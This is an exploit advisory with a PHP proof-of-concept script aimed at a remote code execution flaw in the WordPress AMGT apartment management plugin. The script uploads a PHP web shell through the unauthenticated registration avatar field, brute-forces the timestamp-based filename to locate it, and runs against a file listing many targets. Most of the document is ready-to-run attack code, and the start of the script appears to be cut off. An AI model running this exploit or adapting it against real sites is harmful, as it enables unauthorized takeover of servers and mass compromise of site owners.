============================================================================================================================================= | # Title : WordPress AMGT 44.0 RCE Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://wordpress.com/plugins/browse/apartment-management | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212164/ & CVE-2025-39401 [+] Summary : A vulnerability in the AMGT membership registration form allows an attacker to upload arbitrary files via the "amgt_user_avatar" parameter. The uploaded file is stored with a timestamp-based filename that can be guessed, allowingremote code execution. – PHP Multi‑Target PoC [+] Affected : Any WordPress installation running AMGT plugin. [+] Impact : Full Remote Code Execution (RCE) in the server’s context. [+] Requirements : No authentication required. [+] Notes : This PHP PoC supports : - Multi-threading simulation using curl_multi - Timestamp brute forcing - Cross‑platform compatibility (Linux/Windows/macOS/BSD) - Custom markers to validate shell execution - Randomized payload and alternative bypass strategies [+] Usage : See instructions at the bottom of this report. [+] POC : Indoushka_RCE\\n"; system(\$_GET['cmd']); ?> PAYLOAD; /* Save shell if missing */ if (!file_exists($SHELL_LOCAL_FILE)) { file_put_contents($SHELL_LOCAL_FILE, $default_shell_payload); } /* ---------------------- HELPERS ------------------------- */ function write_result($file, $value) { file_put_contents($file, $value . PHP_EOL, FILE_APPEND); } function generate_filename($original, $ts, $mark = "pimg") { $ext = pathinfo($original, PATHINFO_EXTENSION); return "{$ts}-{$mark}-in.{$ext}"; } function http_post($url, $fields, $files, $ua) { $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $ua, CURLOPT_POST => true, CURLOPT_POSTFIELDS => array_merge($fields, $files), CURLOPT_TIMEOUT => 30 ]); $resp = curl_exec($curl); $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); return [$status, $resp]; } function http_get($url, $ua) { $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $ua, CURLOPT_TIMEOUT => 20 ]); $resp = curl_exec($curl); $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); return [$status, $resp]; } /* ------------------- EXPLOIT FUNCTION --------------------- */ function exploit_target($target_url, $marker) { global $USER_AGENT, $SHELL_LOCAL_FILE, $SUCCESS_FILE, $UPLOADED_FILE, $INITIAL_SLEEP, $RETRIES, $BETWEEN_RETRIES, $WINDOW; if (!file_exists($SHELL_LOCAL_FILE)) { echo "[ERROR] Missing shell file.\n"; return; } $ts = time(); $email = "indoushka_{$ts}@exploit.com"; echo "\n[+] Uploading shell to: $target_url\n"; $upload_url = rtrim($target_url, "/") . "/apartment-management-member-registration-page/"; $fields = [ "building_id" => "1", "unit_cat_id" => "2", "unit_name" => "Unit-X", "member_type" => "Owner", "first_name" => "Indo", "last_name" => "Ushka", "gender" => "male", "birth_date" => "1990-01-01", "mobile" => "99887766", "email" => $email, "password" => "Indo1337!", "registration_front_member" => "1" ]; $files = [ "amgt_user_avatar" => new CURLFile($SHELL_LOCAL_FILE) ]; http_post($upload_url, $fields, $files, $USER_AGENT); echo "[+] Uploaded. Sleeping {$INITIAL_SLEEP}s...\n"; sleep($INITIAL_SLEEP); echo "[+] Brute-forcing timestamp window...\n"; for ($attempt = 0; $attempt < $RETRIES; $attempt++) { for ($d = -$WINDOW; $d <= $WINDOW; $d++) { $guess = $ts + $d + $attempt; $name = generate_filename($SHELL_LOCAL_FILE, $guess); $shell_url = rtrim($target_url, "/") . "/wp-content/uploads/apartment_assets/" . $name; list($code, $body) = http_get($shell_url, $USER_AGENT); if ($code == 200 && strpos($body, $marker) !== false) { echo "[✓] SHELL FOUND: $shell_url\n"; write_result($SUCCESS_FILE, "$target_url | $shell_url"); write_result($UPLOADED_FILE, $shell_url); return; } echo "[x] $code → $shell_url\n"; } sleep($BETWEEN_RETRIES); } echo "[✗] Not found.\n"; } /* ------------------ MAIN ------------------ */ echo "\n=== AMGT PHP Exploit by Indoushka ===\n"; $list = readline("Enter targets file (e.g., list.txt): "); $marker = readline("Enter shell marker (default: Indoushka_RCE): "); if (!$marker) $marker = "Indoushka_RCE"; $targets = file($list, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); foreach ($targets as $t) { exploit_target(trim($t), $marker); } echo "\nDone. Results saved.\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================